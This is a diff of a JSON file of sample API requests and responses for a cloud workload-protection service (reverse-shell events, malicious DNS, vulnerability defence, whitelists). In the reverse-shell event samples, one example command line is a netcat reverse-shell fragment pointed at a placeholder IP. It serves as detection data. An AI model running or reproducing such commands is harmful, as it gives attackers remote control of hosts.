- "output": "{\n \"Response\": {\n \"ReverseShellEventInfo\": {\n \"UserName\": \"xx\",\n \"Uuid\": \"xx\",\n \"ParentProcUser\": \"xx\",\n \"UserGroup\": \"xx\",\n \"DetectBy\": 1,\n \"Status\": 1,\n \"ModifyTime\": \"xx\",\n \"MachineWanIp\": \"xx\",\n \"Tags\": [\n \"xx\"\n ],\n \"MachineName\": \"xx\",\n \"CreateTime\": \"xx\",\n \"HarmDescribe\": \"xx\",\n \"SuggestScheme\": \"xx\",\n \"DstIp\": \"xx\",\n \"CmdLine\": \"xx\",\n \"ParentProcName\": \"xx\",\n \"ProcessName\": \"xx\",\n \"ParentProcPath\": \"xx\",\n \"Id\": 1,\n \"References\": [\n \"xx\"\n ],\n \"Quuid\": \"xx\",\n \"ParentProcGroup\": \"xx\",\n \"HostIp\": \"xx\",\n \"MachineStatus\": \"xx\",\n \"FullPath\": \"xx\",\n \"DstPort\": 1,\n \"PsTree\": \"xx\"\n },\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\"\n }\n}",
2230
- "title": "示例"
2217
+ "output": "{\n \"Response\": {\n \"ReverseShellEventInfo\": {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\",\n \"DstIp\": \"\",\n \"DstPort\": 0,\n \"ProcessName\": \"mkfifo\",\n \"FullPath\": \"/usr/bin/mkfifo\",\n \"CmdLine\": \"mkfifo /tmp/pipe nc 1.1.1.1 1234\",\n \"UserName\": \"0\",\n \"UserGroup\": \"\",\n \"ParentProcName\": \"\",\n \"ParentProcUser\": \"0\",\n \"ParentProcGroup\": \"\",\n \"ParentProcPath\": \"\",\n \"PsTree\": \"[]\",\n \"Status\": 0,\n \"CreateTime\": \"2024-09-27 15:43:56\",\n \"ModifyTime\": \"2024-09-27 15:44:32\",\n \"MachineName\": \"机器名称\",\n \"DetectBy\": 1,\n \"MachineWanIp\": \"1.1.1.1\",\n \"SuggestScheme\": \"1、检查系统是否存在异常的网络连接;\\n2、隔离或者删除相关的木马文件;xa0\\n3、对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会让受害主机创建一个交互式shell并连接黑客的远程控制服务器,黑客通过建立的通道,可以向受害主机发送指令并获得执行结果。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineStatus\": \"ONLINE\"\n },\n \"RequestId\": \"db8fd5e1-6d57-405b-9f57-9d6d0589bdc8\"\n }\n}",
2218
+ "title": "查询反弹shell详情"
2231
2219
  }
2232
2220
  ],
2233
2221
  "DescribeReverseShellEvents": [
2234
2222
  {
2235
2223
  "document": "获取反弹Shell列表",
2236
2224
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeReverseShellEvents\n<公共请求参数>\n\n{}",
2237
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"UserName\": \"xx\",\n \"Status\": 1,\n \"ParentProcName\": \"xx\",\n \"DstIp\": \"xx\",\n \"Uuid\": \"xx\",\n \"CmdLine\": \"xx\",\n \"ProcTree\": \"xx\",\n \"MachineName\": \"xx\",\n \"DetectBy\": 1,\n \"ParentProcPath\": \"xx\",\n \"CreateTime\": \"xx\",\n \"ProcessName\": \"xx\",\n \"Hostip\": \"xx\",\n \"Quuid\": \"xx\",\n \"ParentProcGroup\": \"xx\",\n \"UserGroup\": \"xx\",\n \"FullPath\": \"xx\",\n \"DstPort\": 1,\n \"ParentProcUser\": \"xx\",\n \"Id\": 1\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2225
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Hostip\": \"1.1.1.1\",\n \"DstIp\": \"\",\n \"DstPort\": 0,\n \"ProcessName\": \"mkfifo\",\n \"FullPath\": \"/usr/bin/mkfifo\",\n \"CmdLine\": \"mkfifo /tmp/pipe nc 1.1.1.1 1234\",\n \"UserName\": \"0\",\n \"UserGroup\": \"\",\n \"ParentProcName\": \"\",\n \"ParentProcUser\": \"0\",\n \"ParentProcGroup\": \"\",\n \"ParentProcPath\": \"\",\n \"ProcTree\": \"null\",\n \"Status\": 0,\n \"CreateTime\": \"2024-09-27 15:43:56\",\n \"MachineName\": \"机器名称\",\n \"DetectBy\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 0,\n \"NetworkName\": \"\",\n \"InstanceID\": \"ins-12332112\",\n \"HostName\": \"\"\n },\n \"Pid\": 0,\n \"RiskLevel\": 1\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2238
2226
  "title": "获取反弹Shell列表"
2239
2227
  }
2240
2228
  ],
@@ -2242,7 +2230,7 @@
2242
2230
  {
2243
2231
  "document": "获取反弹Shell规则列表",
2244
2232
  "input": "https://cwp.tencentcloudapi.com/?Action=DescribeReverseShellRules\n&<公共请求参数>",
2245
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Status\": 1,\n \"Uuid\": \"xx\",\n \"DestIp\": \"xx\",\n \"Hostip\": \"xx\",\n \"IsGlobal\": 1,\n \"CreateTime\": \"xx\",\n \"ProcessName\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"Operator\": \"xx\",\n \"Id\": 1,\n \"DestPort\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2233
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"DestIp\": \"127.0.0.1\",\n \"DestPort\": \"\",\n \"ProcessName\": \"aaaaa\",\n \"IsGlobal\": 0,\n \"Operator\": \"\",\n \"Status\": 0,\n \"CreateTime\": \"2024-10-12 11:38:43\",\n \"ModifyTime\": \"2024-10-12 11:38:43\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2246
2234
  "title": "获取反弹Shell规则列表"
2247
2235
  }
2248
2236
  ],
@@ -2274,7 +2262,7 @@
2274
2262
  {
2275
2263
  "document": "查询恶意请求详情",
2276
2264
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeRiskDnsInfo\n<公共请求参数>\n\n{\n \"Id\": 1\n}",
2277
- "output": "{\n \"Response\": {\n \"RiskDnsInfo\": {\n \"Url\": \"xx\",\n \"AccessCount\": 1,\n \"ProcessName\": \"xx\",\n \"ProcessMd5\": \"xx\",\n \"GlobalRuleId\": 1,\n \"UserRuleId\": 1,\n \"Status\": 1,\n \"CreateTime\": \"xx\",\n \"MergeTime\": \"xx\",\n \"Quuid\": \"xx\",\n \"HostIp\": \"xx\",\n \"Alias\": \"xx\",\n \"Description\": \"xx\",\n \"Id\": 1,\n \"Reference\": \"xx\",\n \"CmdLine\": \"xx\",\n \"Pid\": 1,\n \"Uuid\": \"xx\",\n \"SuggestScheme\": \"xx\",\n \"Tags\": [\n \"xx\"\n ],\n \"MachineWanIp\": \"xx\",\n \"MachineStatus\": \"xx\"\n },\n \"RequestId\": \"xx\"\n }\n}",
2265
+ "output": "{\n \"Response\": {\n \"RequestId\": \"5d14133e-4727-4937-b076-6ff1b9a59f14\",\n \"RiskDnsInfo\": {\n \"Url\": \"www.xxxx.com\",\n \"AccessCount\": 7,\n \"ProcessName\": \"\",\n \"ProcessMd5\": \"\",\n \"GlobalRuleId\": 0,\n \"UserRuleId\": 0,\n \"Status\": 0,\n \"CreateTime\": \"2024-10-24 09:10:13\",\n \"MergeTime\": \"2024-10-24 09:10:27\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\",\n \"Alias\": \"别名\",\n \"Description\": \"未知的APT组织\",\n \"Id\": 10001,\n \"Pid\": 0,\n \"CmdLine\": \"\",\n \"Reference\": \"\",\n \"SuggestScheme\": \"1、检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2、隔离或者删除相关的木马文件;\\n3、对系统进行风险排查,并进行安全加固,详情可参考如下链接: \\n【Linux】https://cloud.tencent.com/document/product/296/9604 \\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"Tags\": [\n \"apt\",\n \"apt\"\n ],\n \"MachineWanIp\": \"1.1.1.1\",\n \"MachineStatus\": \"ONLINE\"\n }\n }\n}",
2278
2266
  "title": "示例"
2279
2267
  }
2280
2268
  ],
@@ -2650,7 +2638,7 @@
2650
2638
  {
2651
2639
  "document": "",
2652
2640
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefenceEvent\n<公共请求参数>\n\n{}",
2653
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Count\": 0,\n \"City\": \"xx\",\n \"CveId\": \"xx\",\n \"VulName\": \"xx\",\n \"EventType\": 1,\n \"Status\": 0,\n \"PublicIp\": \"xx\",\n \"Alias\": \"xx\",\n \"CreateTime\": \"xx\",\n \"Quuid\": \"xx\",\n \"MergeTime\": \"xx\",\n \"VulId\": 1,\n \"SourcePort\": [\n 1\n ],\n \"PrivateIp\": \"xx\",\n \"SourceIp\": \"xx\",\n \"Id\": 0\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2641
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Alias\": \"harborV2_yancyw\",\n \"PrivateIp\": \"1.1.1.1\",\n \"PublicIp\": \"1.1.1.1\",\n \"UpgradeType\": 1,\n \"VulId\": 101824,\n \"VulName\": \"Apache log4j2 远程代码执行漏洞 (CVE-2021-44228)\",\n \"CveId\": \"CVE-2021-44228\",\n \"FixType\": 0,\n \"EventType\": 2,\n \"SourceIp\": \"\",\n \"City\": \"\",\n \"SourcePort\": [],\n \"CreateTime\": \"2024-10-23 11:41:10\",\n \"MergeTime\": \"2024-10-23 11:43:52\",\n \"Count\": 20,\n \"Status\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 1,\n \"NetworkName\": \"vpc-12332112\",\n \"InstanceID\": \"ins-12332112\",\n \"HostName\": \"机器名称\"\n }\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2654
2642
  "title": "获取漏洞防御事件列表"
2655
2643
  }
2656
2644
  ],
@@ -2674,7 +2662,7 @@
2674
2662
  {
2675
2663
  "document": "",
2676
2664
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulDefencePluginDetail\n<公共请求参数>\n\n{\n \"Quuid\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\"\n}",
2677
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Status\": 0,\n \"MainClass\": \"xx\",\n \"ErrorLog\": \"xx\",\n \"Pid\": 0,\n \"InjectLog\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2665
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Pid\": 2302060,\n \"MainClass\": \"org.springframework.boot.loader.JarLauncher\",\n \"Status\": 1,\n \"ErrorLog\": \"\",\n \"InjectLog\": \"\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2678
2666
  "title": "获取单台主机漏洞防御插件信息"
2679
2667
  }
2680
2668
  ],
@@ -2714,7 +2702,7 @@
2714
2702
  {
2715
2703
  "document": "漏洞影响主机列表",
2716
2704
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulEffectModules\n<公共请求参数>\n\n{\n \"Offset\": \"0\",\n \"Limit\": \"10\",\n \"VulId\": \"100435\"\n}",
2717
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"VulEffectModuleInfo\": [\n {\n \"Name\": \"xx\",\n \"FixCmd\": \"xx\",\n \"Rule\": \"xx\",\n \"Version\": \"xx\",\n \"Uuids\": [\n \"xx\"\n ],\n \"Path\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2705
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"VulEffectModuleInfo\": [\n {\n \"Name\": \"openssl-devel\",\n \"Version\": \"1:1.0.2k-19.el7\",\n \"FixCmd\": \"sudo yum update openssl-devel\\n\",\n \"Path\": \"/usr/include/openssl\",\n \"Rule\": \"openssl-devel version less than 1:1.0.2k-22.el7_9\",\n \"Uuids\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ],\n \"Quuids\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ]\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2718
2706
  "title": "漏洞影响主机列表"
2719
2707
  }
2720
2708
  ],
@@ -2729,8 +2717,8 @@
2729
2717
  "DescribeVulFixStatus": [
2730
2718
  {
2731
2719
  "document": "",
2732
- "input": "https://cwp.tencentcloudapi.com/?Action=DescribeVulFixStatus\n&FixId=1\n&<公共请求参数>",
2733
- "output": "{\n \"Response\": {\n \"FixEndTime\": \"xx\",\n \"SnapshotFailCnt\": 1,\n \"SnapshotList\": [\n {\n \"Status\": 1,\n \"SnapshotName\": \"xx\",\n \"HostName\": \"xx\",\n \"FailReason\": \"xx\",\n \"Quuid\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"SnapshotId\": \"xx\",\n \"HostIp\": \"xx\",\n \"Id\": 1\n }\n ],\n \"FixSuccessCnt\": 1,\n \"FixProgress\": 1,\n \"FixStartTime\": \"xx\",\n \"IsRetrySnapshot\": 1,\n \"RemainingTime\": 1,\n \"IsAllowRetry\": 1,\n \"HostCnt\": 1,\n \"SnapshotProgress\": 1,\n \"FixId\": 1,\n \"FixFailCnt\": 1,\n \"VulFixList\": [\n {\n \"VulName\": \"xx\",\n \"FixSuccessCnt\": 1,\n \"HostList\": [\n {\n \"Status\": 1,\n \"ModifyTime\": \"xx\",\n \"HostName\": \"xx\",\n \"FailReason\": \"xx\",\n \"Quuid\": \"xx\",\n \"HostIp\": \"xx\"\n }\n ],\n \"FailCnt\": 1,\n \"VulId\": 1,\n \"Progress\": 1\n }\n ],\n \"RequestId\": \"c741a4fd-776f-499b-85a2-7bc70fd5b92s\"\n }\n}",
2720
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulFixStatus\n<公共请求参数>\n\n{\n \"FixId\": \"1\"\n}",
2721
+ "output": "{\n \"Response\": {\n \"FixEndTime\": \"2019-12-25 11:57:15\",\n \"SnapshotFailCnt\": 1,\n \"SnapshotList\": [\n {\n \"Status\": 1,\n \"SnapshotName\": \"快照名称\",\n \"HostName\": \"机器名称\",\n \"FailReason\": \"\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"ModifyTime\": \"2019-12-25 11:57:15\",\n \"SnapshotId\": \"快照ID\",\n \"HostIp\": \"1.1.1.1\",\n \"Id\": 1\n }\n ],\n \"FixSuccessCnt\": 1,\n \"FixProgress\": 1,\n \"FixStartTime\": \"2019-12-25 11:57:15\",\n \"IsRetrySnapshot\": 1,\n \"RemainingTime\": 1,\n \"IsAllowRetry\": 1,\n \"HostCnt\": 1,\n \"SnapshotProgress\": 1,\n \"FixId\": 1,\n \"FixFailCnt\": 1,\n \"VulFixList\": [\n {\n \"VulName\": \"漏洞名称\",\n \"FixSuccessCnt\": 1,\n \"HostList\": [\n {\n \"Status\": 1,\n \"ModifyTime\": \"2019-12-25 11:57:15\",\n \"HostName\": \"机器名称\",\n \"FailReason\": \"\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\"\n }\n ],\n \"FailCnt\": 1,\n \"VulId\": 1,\n \"Progress\": 1\n }\n ],\n \"RequestId\": \"c741a4fd-776f-499b-85a2-7bc70fd5b92s\"\n }\n}",
2734
2722
  "title": "漏洞修护-查找主机漏洞修护进度"
2735
2723
  }
2736
2724
  ],
@@ -2913,7 +2901,7 @@
2913
2901
  "EditBashRules": [
2914
2902
  {
2915
2903
  "document": "新增/修改高危命令规则,之前的EditBashRule只支持用户输入单个IP去新增或修改高危命令规则,而该接口EditBashRules支持多服务器选择。",
2916
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: EditBashRules\n<公共请求参数>\n\n{\n \"Name\": \"test\",\n \"Level\": 1,\n \"Rule\": \".*\",\n \"IsGlobal\": 0,\n \"Uuids\": [\n \"uuids1\",\n \"uuids2\"\n ]\n}",
2904
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: EditBashRules\n<公共请求参数>\n\n{\n \"Name\": \"test\",\n \"Level\": 1,\n \"Rule\": \".*\",\n \"IsGlobal\": 0,\n \"Uuids\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ]\n}",
2917
2905
  "output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
2918
2906
  "title": "新增/修改高危命令规则"
2919
2907
  }
@@ -3258,7 +3246,7 @@
3258
3246
  {
3259
3247
  "document": "导出木马记录",
3260
3248
  "input": "https://cwp.tencentcloudapi.com/?Action=ExportMalwares\n&<公共请求参数>",
3261
- "output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"\",\n \"TaskId\": \"123\"\n }\n}",
3249
+ "output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"\",\n \"TaskId\": \"100000\"\n }\n}",
3262
3250
  "title": "导出木马记录"
3263
3251
  }
3264
3252
  ],
@@ -3289,7 +3277,7 @@
3289
3277
  "ExportRansomDefenseBackupList": [
3290
3278
  {
3291
3279
  "document": "导出主机快照备份列表",
3292
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportRansomDefenseBackupList\n<公共请求参数>\n\n{\n \"Filters\": [\n {\n \"Name\": \"abc\",\n \"Values\": [\n \"abc\"\n ],\n \"ExactMatch\": true\n }\n ],\n \"Order\": \"abc\",\n \"By\": \"abc\",\n \"Quuid\": \"abc\"\n}",
3280
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportRansomDefenseBackupList\n<公共请求参数>\n\n{\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n}",
3293
3281
  "output": "{\n \"Response\": {\n \"TaskId\": \"123\",\n \"RequestId\": \"123123\"\n }\n}",
3294
3282
  "title": "导出主机快照备份列表"
3295
3283
  }
@@ -3426,7 +3414,7 @@
3426
3414
  {
3427
3415
  "document": "",
3428
3416
  "input": "https://cwp.tencentcloudapi.com/?Action=ExportVulEffectHostList\n&VulId=100435\n&<公共请求参数>",
3429
- "output": "{\n \"Response\": {\n \"DownloadUrl\": \"xx\",\n \"RequestId\": \"xx\",\n \"TaskId\": \"xx\"\n }\n}",
3417
+ "output": "{\n \"Response\": {\n \"DownloadUrl\": \"\",\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"TaskId\": \"10001\"\n }\n}",
3430
3418
  "title": "导出漏洞影响主机列表"
3431
3419
  }
3432
3420
  ],
@@ -3442,7 +3430,7 @@
3442
3430
  {
3443
3431
  "document": "导出漏洞列表数据,获取下载url",
3444
3432
  "input": "https://cwp.tencentcloudapi.com/?Action=ExportVulList\n&IfDetail=1\n&<公共请求参数>",
3445
- "output": "{\n \"Response\": {\n \"DownloadUrl\": \"xx\",\n \"RequestId\": \"xx\",\n \"TaskId\": \"xx\"\n }\n}",
3433
+ "output": "{\n \"Response\": {\n \"DownloadUrl\": \"\",\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"TaskId\": \"10001\"\n }\n}",
3446
3434
  "title": "导出漏洞列表数据,获取下载url"
3447
3435
  }
3448
3436
  ],
@@ -3708,15 +3696,15 @@
3708
3696
  {
3709
3697
  "document": "编辑登录审计白名单",
3710
3698
  "input": "https://cwp.tencentcloudapi.com/?Action=ModifyLoginWhiteInfo\n&HostLoginWhiteObj.Places.0.CityId=111\n&HostLoginWhiteObj.Places.0.ProvinceId=11\n&HostLoginWhiteObj.Places.0.CountryId=1\n&HostLoginWhiteObj.SrcIp=1.2.3.4\n&HostLoginWhiteObj.UserName=\"aaa\"\n&HostLoginWhiteObj.Id=128\n&HostLoginWhiteObj.Remark=\"updateRemark1\"\n&<公共请求参数>",
3711
- "output": "{\n \"Response\": {\n \"RequestId\": \"4234234\"\n }\n}",
3699
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
3712
3700
  "title": "编辑登录审计白名单"
3713
3701
  }
3714
3702
  ],
3715
3703
  "ModifyLoginWhiteRecord": [
3716
3704
  {
3717
3705
  "document": "编辑登录审计白名单",
3718
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLoginWhiteRecord\n<公共请求参数>\n\n{\n \"UserName\": \"abc\",\n \"SrcIp\": \"abc\",\n \"StartTime\": \"abc\",\n \"EndTime\": \"abc\",\n \"Remark\": \"abc\",\n \"IsGlobal\": 1,\n \"Id\": 1,\n \"Hosts\": [\n {\n \"Quuid\": \"abc\",\n \"Uuid\": \"abc\"\n }\n ],\n \"Places\": [\n {\n \"CityId\": 1,\n \"ProvinceId\": 1,\n \"CountryId\": 1,\n \"Location\": \"abc\"\n }\n ]\n}",
3719
- "output": "{\n \"Response\": {\n \"RequestId\": \"4234234\"\n }\n}",
3706
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLoginWhiteRecord\n<公共请求参数>\n\n{\n \"UserName\": \"root\",\n \"SrcIp\": \"1.1.1.1.1\",\n \"StartTime\": \"2019-12-25 11:57:15\",\n \"EndTime\": \"2019-12-25 11:57:15\",\n \"Remark\": \"备注\",\n \"IsGlobal\": 1,\n \"Id\": 1,\n \"Hosts\": [\n {\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n }\n ],\n \"Places\": [\n {\n \"CityId\": 1,\n \"ProvinceId\": 1,\n \"CountryId\": 1,\n \"Location\": \"1.1.1.1\"\n }\n ]\n}",
3707
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
3720
3708
  "title": "编辑登录审计白名单"
3721
3709
  }
3722
3710
  ],
@@ -3755,8 +3743,8 @@
3755
3743
  "ModifyMalwareWhiteList": [
3756
3744
  {
3757
3745
  "document": "",
3758
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyMalwareWhiteList\n<公共请求参数>\n\n{\n \"Id\": 10,\n \"QuuidList\": [\n \"xx\"\n ],\n \"Mode\": 0,\n \"Md5List\": [\n \"xx\"\n ]\n}",
3759
- "output": "{\n \"Response\": {\n \"RequestId\": \"xx\"\n }\n}",
3746
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyMalwareWhiteList\n<公共请求参数>\n\n{\n \"Id\": 10,\n \"QuuidList\": [\n \"1c26308c-5493-4eaf-a817-112ec25f499e\"\n ],\n \"Mode\": 0,\n \"Md5List\": [\n \"d7455d1d714ffc2b08d141332ed3e563\"\n ]\n}",
3747
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
3760
3748
  "title": "编辑木马白名单"
3761
3749
  }
3762
3750
  ],
@@ -3771,7 +3759,7 @@
3771
3759
  "ModifyNetAttackWhiteList": [
3772
3760
  {
3773
3761
  "document": "编辑网络攻击白名单",
3774
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyNetAttackWhiteList\n<公共请求参数>\n\n{\n \"QuuidList\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ],\n \"Scope\": 0,\n \"SrcIp\": [\n \"1.2.3.5\",\n \"1.1.1.2-1.1.1.4\",\n \"1.2.3.0/24\"\n ],\n \"DealOldEvents\": 0,\n \"Description\": \"123\",\n \"Id\": 10001\n}",
3762
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyNetAttackWhiteList\n<公共请求参数>\n\n{\n \"QuuidList\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ],\n \"Scope\": 0,\n \"SrcIp\": [\n \"1.2.3.5\",\n \"1.1.1.2-1.1.1.4\",\n \"1.2.3.0/24\"\n ],\n \"DealOldEvents\": 0,\n \"Description\": \"\",\n \"Id\": 10001\n}",
3775
3763
  "output": "{\n \"Response\": {\n \"RequestId\": \"1a07706f-368e-49e5-8967-594826f43d0d\"\n }\n}",
3776
3764
  "title": "编辑网络攻击白名单"
3777
3765
  }
@@ -3803,8 +3791,8 @@
3803
3791
  "ModifyReverseShellRulesAggregation": [
3804
3792
  {
3805
3793
  "document": "增加正则规则",
3806
- "input": "POST / HTTP/1.1\nHost: xxx\nContent-Type: application/json\nX-TC-Action: ModifyReverseShellRulesAggregation\n<公共请求参数>\n\n{\n \"IsGlobal\": 1,\n \"WhiteType\": 1,\n \"RuleRegexp\": \"xxx\",\n \"HandleHistory\": 1,\n \"GroupID\": \"\"\n}",
3807
- "output": "{\n \"Response\": {\n \"RequestId\": \"1\"\n }\n}",
3794
+ "input": "POST / HTTP/1.1\nHost: xxx\nContent-Type: application/json\nX-TC-Action: ModifyReverseShellRulesAggregation\n<公共请求参数>\n\n{\n \"IsGlobal\": 1,\n \"WhiteType\": 1,\n \"RuleRegexp\": \"sh cmdline\",\n \"HandleHistory\": 1,\n \"GroupID\": \"\"\n}",
3795
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
3808
3796
  "title": "增加正则规则"
3809
3797
  }
3810
3798
  ],